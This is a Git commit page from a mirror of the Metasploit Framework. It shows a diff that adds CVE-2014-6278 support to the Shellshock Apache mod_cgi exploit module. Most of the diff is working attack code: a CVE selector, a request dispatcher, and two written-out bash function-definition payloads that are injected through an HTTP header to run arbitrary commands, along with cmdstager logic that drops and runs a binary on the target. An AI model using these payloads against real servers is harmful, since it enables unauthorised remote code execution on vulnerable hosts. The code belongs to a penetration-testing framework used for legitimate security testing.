infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add CVE-2014-6278 support to the exploit module 

Same thing.
bug/bundler_fix
William Vu 2014-10-01 17:58:25 -05:00
parent 51bc5f52c1
commit c1b0acf460
No known key found for this signature in database
GPG Key ID: E761DCB4C1629024
1 changed files with 22 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
View File

@ -22,10 +22,12 @@ class Metasploit4 < Msf::Exploit::Remote
'Author' => [
'Stephane Chazelas', # Vulnerability discovery
'wvu', # Original Metasploit aux module
'juan vazquez' # Allow wvu's module to get native sessions
'juan vazquez', # Allow wvu's module to get native sessions
'lcamtuf' # CVE-2014-6278
],
'References' => [
['CVE', '2014-6271'],
['CVE', '2014-6278'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://access.redhat.com/articles/1200223'],
@ -64,12 +66,13 @@ class Metasploit4 < Msf::Exploit::Remote
OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5]),
OptEnum.new('CVE', [true, 'CVE to check/exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278']])
], self.class)
end
def check
res = req("echo #{marker}")
res = req("echo #{marker}", datastore['CVE'])
if res && res.body.include?(marker * 3)
return Exploit::CheckCode::Vulnerable
@ -105,31 +108,42 @@ class Metasploit4 < Msf::Exploit::Remote
# A last chance after the cmdstager
# Trying to make it generic
unless session_created?
req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}", datastore['CVE'])
end
end
def execute_command(cmd, opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
req(cmd)
req(cmd, datastore['CVE'])
end
def req(cmd)
def req(cmd, cve)
case cve
when 'CVE-2014-6271'
sploit = cve_2014_6271(cmd)
when 'CVE-2014-6278'
sploit = cve_2014_6278(cmd)
end
send_request_cgi(
{
'method' => datastore['METHOD'],
'uri' => normalize_uri(target_uri.path.to_s),
'headers' => {
datastore['HEADER'] => sploit(cmd)
datastore['HEADER'] => sploit
}
}, datastore['TIMEOUT'])
end
def sploit(cmd)
def cve_2014_6271(cmd)
%Q{() { :;};echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"}
end
def cve_2014_6278(cmd)
%Q{() { _; } >_[$($())] { echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"; }}
end
def marker
@marker ||= rand_text_alphanumeric(rand(42) + 1)
end